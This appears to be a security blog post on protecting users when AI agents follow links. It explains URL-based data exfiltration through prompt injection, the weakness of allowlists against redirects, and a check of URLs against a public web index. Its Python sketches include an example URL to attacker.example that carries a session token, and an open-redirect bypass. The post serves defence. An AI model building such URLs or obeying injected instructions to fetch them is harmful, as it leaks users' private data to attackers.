January 28, 2026
Keeping your data safe when an AI agent clicks a link
AI systems are getting better at taking actions on your behalf: opening a web page, following a link, or loading an image to help answer a question. These useful capabilities also introduce subtle risks, which we work continuously to mitigate.

TL;DR
- AI systems can be exploited via URL-based data exfiltration attacks.
- Attackers can trick AI into requesting URLs containing sensitive data.
- Simple allowlists of trusted sites are not enough, because of redirects and user-experience limitations.
- OpenAI verifies URLs against an independent web index of publicly known pages.
- If a URL is not found in the public index, it is treated as unverified and requires explicit user action before it is opened.
- This system prevents the quiet leaking of user-specific data through URLs.
- It does not guarantee the trustworthiness of web page content or protect against all social engineering or harmful instructions.
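To make the first two bullets concrete, here is a minimal sketch of a URL-based exfiltration attack. The attacker host, query parameter name, and the `secret` value are all hypothetical placeholders; the point is only that any data an agent can be tricked into templating into a URL reaches the server that receives the request.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical placeholder for user-specific data the attacker targets.
secret = "example-session-token"

# An injected instruction on a malicious page can ask the agent to load an
# innocuous-looking image whose query string carries the data.
exfil_url = "https://attacker.example/pixel.png?" + urlencode({"d": secret})

# If the agent fetches this URL, the attacker's server logs receive the data,
# even though no page content ever displays it.
leaked = parse_qs(urlparse(exfil_url).query)["d"][0]
print(leaked)  # example-session-token
```

Nothing about the request looks unusual to the agent: it is an ordinary image fetch, which is why the defense has to focus on the URL itself rather than on the fetch.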
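The bullet on trusted-site lists can also be sketched in code. This is an illustrative toy, not a real fetcher: `TRUSTED_HOSTS` is a hypothetical allowlist, and the `redirects` dict stands in for an open redirect hosted on a trusted site.

```python
from urllib.parse import urlparse

# Hypothetical allowlist and a stand-in for an open redirect on a trusted host.
TRUSTED_HOSTS = {"trusted.example"}
redirects = {
    "https://trusted.example/r?to=attacker":
        "https://attacker.example/collect?d=example-session-token",
}

def allowlist_allows(url: str) -> bool:
    """Approve a URL if (and only if) its host is on the trusted list."""
    return urlparse(url).hostname in TRUSTED_HOSTS

initial = "https://trusted.example/r?to=attacker"
final = redirects.get(initial, initial)

print(allowlist_allows(initial))  # True: the allowlist approves the initial URL
print(allowlist_allows(final))    # False: the request lands on an attacker host
```

Because the allowlist only ever sees the initial URL, a single open redirect on any trusted domain defeats the whole scheme, which is one reason a static list is insufficient on its own.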
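The verification approach described in the TL;DR can be sketched as a simple membership check. This is a conceptual illustration only, assuming a hypothetical `PUBLIC_INDEX` set that stands in for an independent index of publicly known pages; the real system's index and matching rules are not specified here.

```python
# Hypothetical stand-in for an independent index of publicly known pages.
PUBLIC_INDEX = {
    "https://en.wikipedia.org/wiki/URL",
    "https://www.example.com/",
}

def classify_url(url: str) -> str:
    """Return 'verified' if the exact URL is publicly known, else 'unverified'.

    A URL that templates user-specific data into its path or query string
    will not appear in any public index, so it falls into the unverified
    bucket and is held for explicit user approval instead of being fetched.
    """
    return "verified" if url in PUBLIC_INDEX else "unverified"

print(classify_url("https://www.example.com/"))  # verified
print(classify_url("https://attacker.example/pixel.png?d=example-session-token"))  # unverified
```

The key property is that the check does not try to judge whether a site is trustworthy; it only asks whether this exact URL already exists publicly, which is precisely what a URL carrying freshly exfiltrated data can never satisfy.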